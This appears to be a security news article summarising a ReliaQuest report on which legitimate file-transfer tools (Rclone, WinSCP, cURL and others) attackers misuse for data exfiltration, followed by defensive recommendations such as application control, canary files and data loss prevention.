Cybercriminals have significantly increased their use of data-exfiltration tools, which are highly effective for stealing sensitive data and evading detection.
This was revealed in a recent report by ReliaQuest, which highlights the evolving strategies of threat actors in the digital landscape. The report, covering incidents from September 2023 to July 2024, examined the tools that have become increasingly popular among malicious actors.
Weapon of Choice
Rclone, an open-source command-line utility, has emerged as a favored tool for data exfiltration, appearing in 57% of incidents investigated by ReliaQuest. Initially designed for legitimate use in synchronizing files across various cloud storage platforms, Rclone’s versatility and efficiency have made it a weapon of choice for threat actors. Its ability to integrate with multiple cloud services such as Google Drive, Amazon S3, and Dropbox allows cybercriminals to transfer large volumes of data quickly, complicating the task of defenders.
ReliaQuest responded to a double extortion attack in one instance, in which the threat actors used a disguised Rclone binary to exfiltrate data to Dropbox. The attackers successfully masked the tool, bypassing static detection measures, and exfiltrated significant amounts of sensitive information before deploying ransomware.
Trusted Tools Turned Malicious
Two other popular (and reputable) IT tools, WinSCP and cURL, have also been exploited maliciously. WinSCP, an open-source file transfer utility for Windows, is prized for its user-friendly interface and powerful scripting capabilities. Malefactors leverage its portability and automation features to exfiltrate data stealthily, often without raising suspicion due to its widespread legitimate use.
cURL, a command-line tool for transferring data via URLs, is another commonly used tool in data-exfiltration operations. Despite being less reliable for large-scale exfiltration than Rclone and WinSCP, cURL’s cross-platform availability and integration with web services make it an effective tool for stealing targeted information. For instance, the Black Basta ransomware group was observed using cURL to exfiltrate sensitive data from an organization via the cloud storage domain temp[.]sh.
The Rise of Atypical and Emerging Tools
Organizations must also stay alert to less frequently used but still significant data-exfiltration tools that can support both large—and small-scale operations. So, while Rclone, WinSCP, and cURL dominate the data-exfiltration landscape, the report also identifies less common but still impactful tools. Although not as frequently used, these tools pose major risks due to their legitimate functions and the ease with which they can be weaponized.
ReliaQuest identified several tools, including MegaSync, Restic, and FileZilla, that, while not as commonly seen, have been used in past incidents and occasionally resurface. Additionally, tools capable of exfiltrating small amounts of data and the ongoing threat of custom exfiltration tools should not be overlooked.
The report also warns of the growing use of Remote Monitoring and Management (RMM) software in data-exfiltration operations. RMM tools, commonly used by IT teams to manage infrastructure, are being exploited by cybercriminals to blend in with normal operations and evade detection.
Understanding the wide range of techniques used in these attacks is key to reducing the risk of data exfiltration by threat actors or insider threats. Due to these methods’ complexity, familiarity with well-known and emerging tools for data exfiltration is vital.
Recommendations and Best Practices
ReliaQuest offers the following measures to help prevent or mitigate the impact of data-exfiltration attempts:
- Application Control: Enforce application controls, such as Group Policy Objects (GPOs), to prevent the execution of unauthorized applications, particularly those capable of exfiltrating data.
- Restrict Access to Commercial Services: Threat actors often exploit commercial services to blend in with the target environment and evade detection. In many incidents handled by ReliaQuest, services like MEGA cloud storage and Dropbox were used for data exfiltration. Organizations should identify and restrict the use of these services, applying controls through proxies, DNS, or application control for Remote Monitoring and Management (RMM) software.
- Logging and Visibility: Security teams need comprehensive visibility to act effectively. Ensure activity logs from critical infrastructure and the broader environment are forwarded to a centralized location. This allows for implementing correlation-based detection rules, threat investigation, and rapid response to incidents involving exfiltration tools.
- Use of Canary Files: Deploy canary files or folders as decoys within the environment to detect unauthorized operations. These files are designed to appear valuable, luring threat actors into triggering alerts. Implementing canary files helps security teams detect modifications and respond quickly, minimizing potential damage.
- Implement Data Loss Prevention (DLP) Tools: Deploy DLP tools to identify, classify, and monitor sensitive data, protecting it from unauthorized access. DLP tools can integrate with directory services and apply role-based access controls, allowing for the creation of custom policies tailored to specific user groups.
Staying Ahead of Evolving Threats
As cybercriminals continue to innovate and adapt, staying ahead of these evolving threats requires a proactive and robust security posture. Entities must remain vigilant, regularly update their defenses, and be prepared to respond swiftly to any signs of data exfiltration.
To read the full report, click here.
About the Author
The opinions expressed in this post belongs to the individual contributors and do not necessarily reflect the views of Information Security Buzz.
